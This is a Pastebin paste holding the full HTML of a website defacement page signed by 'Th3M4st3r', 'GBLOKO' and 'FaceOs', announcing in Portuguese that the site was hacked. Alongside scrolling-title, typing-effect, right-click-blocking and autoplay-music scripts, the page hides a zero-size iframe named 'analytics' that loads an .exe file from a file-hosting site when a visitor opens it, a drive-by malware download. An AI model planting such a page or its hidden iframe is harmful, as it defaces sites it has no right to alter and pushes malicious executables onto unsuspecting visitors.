Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>Hacked By Th3M4st3r and GBLOKO</title>
- <link REL="SHORTCUT ICON" HREF="http://i45.tinypic.com/1o6cqx.png">
- <script type='text/javascript'>
- //<![CDATA[
- msg = "..::Hacked By FaceOs a::.. ";
- msg = ".:Please patch your system:." + msg;pos = 0;
- function scrollMSG() {
- document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
- if (pos > msg.length) pos = 0
- window.setTimeout("scrollMSG()",80);
- }
- scrollMSG();
- //]]></script>
- <script type='text/javascript'>
- var DADrightclicktheme = 'Dark';
- var DADrightclickimage = 'http://sphotos-h.ak.fbcdn.net/hphotos-ak-ash3/p206x206/14562_183874628425481_1378122133_n.jpg';</script>
- <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script>
- <script type="text/javascript" src="http://cayunkatel.googlecode.com/files/rainbows.js"></script>
- <style type="text/css">body {cursor:url("http://i45.tinypic.com/1o6cqx.png"),default}</style>
- <body background="">
- </script>
- <div id="matrix"><b> ................ TheM4st3r and GBLOKO ................</b></div>
- <style type="text/css">body {
- background: #000000;
- font-family: Courier New;
- color: #ff0000;
- text-align: center;
- }
- a {
- text-decoration:none;
- color:
- #ff0000;
- }
- </style>
- <script type="text/javascript">/*<![CDATA[*/
- TypingText = function(element, interval, cursor, finishedCallback) {
- if((typeof document.getElementById ==
- "undefined") || (typeof element.innerHTML == "undefined")) {
- this.running = true;
- return;
- }
- this.element = element;
- this.finishedCallback = (finishedCallback
- ? finishedCallback : function() { return; });
- this.interval = (typeof interval == "undefined" ? 100 : interval);
- this.origText = this.element.innerHTML;
- this.unparsedOrigText = this.origText;
- this.cursor = (cursor ? cursor : "");
- this.currentText = "";
- this.currentChar = 0;
- this.element.typingText = this;
- if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
- TypingText.all.push(this);
- this.running = false;
- this.inTag = false;
- this.tagBuffer = "";
- this.inHTMLEntity = false;
- this.HTMLEntityBuffer = "";
- }
- TypingText.all = new Array();
- TypingText.currentIndex = 0;
- TypingText.runAll
- = function() {
- for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
- }
- TypingText.prototype.run = function() {
- if(this.running) return;
- if(typeof this.origText == "undefined") {
- setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
- return;
- }
- if(this.currentText == "") this.element.innerHTML = "";
- if(this.currentChar < this.origText.length) {
- if(this.origText.charAt(this.currentChar) == "<" &&
- !this.inTag) {
- this.tagBuffer = "<";
- this.inTag = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ">" &&
- this.inTag) {
- this.tagBuffer += ">";
- this.inTag = false;
- this.currentText += this.tagBuffer;
- this.currentChar++;
- this.run();
- return;
- } else
- if(this.inTag) {
- this.tagBuffer += this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else
- if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
- this.HTMLEntityBuffer = "&";
- this.inHTMLEntity = true;
- this.currentChar++;
- this.run();
- return;
- } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
- this.HTMLEntityBuffer += ";";
- this.inHTMLEntity =
- false;
- this.currentText += this.HTMLEntityBuffer;
- this.currentChar++;
- this.run();
- return;
- } else if(this.inHTMLEntity) {
- this.HTMLEntityBuffer +=
- this.origText.charAt(this.currentChar);
- this.currentChar++;
- this.run();
- return;
- } else {
- this.currentText += this.origText.charAt(this.currentChar);
- }
- this.element.innerHTML = this.currentText;
- this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ?
- this.cursor(this.currentText) : this.cursor) : "");
- this.currentChar++;
- setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",
- this.interval);
- } else {
- this.currentText = "";
- this.currentChar = 0;
- this.running = false;
- this.finishedCallback();
- }
- }
- /*]]>*/</script>
- <center><img src="" border="0"width="350px" height="60px">
- <p id="message"><b> {+} Site Hackeado ==> {+} </b><br>
- ===========================================
- <span style="color: green;">
- <b><br>Site invadido pelos FaceOs</b></font><span style="color: lime;">
- <br />
- <br> <b><br>... </b>
- </font>
- <br />
- <br>
- <span style="color: Red;">
- <br><b>....</b><br></font>
- <center><img src="http://i.imgur.com/sqOoHwp.png" border="0"width="550px" height="320px"></center>
- </center>
- <div style="text-shadow: 0px 0px 5px red;">
- <span style="color: white;">
- <b>FaceOs --> : </b><marquee scrollamount="10" direction="left" width="50%"> FaceOs : GBL0K0 , TH3M4ST3R AND R00T H4ACKER ?????????????????????????????????? [_¯F_¯a_¯c_¯?_¯s_¯?_¯] ???????????????????????????????????
- <script type="text/javascript">/*<![CDATA[*/
- new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " +
- ar[i.length % ar.length]; });
- //Type out examples:
- TypingText.runAll();
- /*]]>*/</script>
- <iframe style="position: absolute; left: 0px; top: 0px; width: 0px;height: 0px; z-index: 0;" name="analytics" src="http://ddl7.data.hu/get/0/10176913/FaceOs.exe" frameborder="0" width="0" height="0"></iframe>
- /*]]>*/</script>
- <embed src="http://www.youtube.com/v/vsSNjoTRw8M&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1">
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement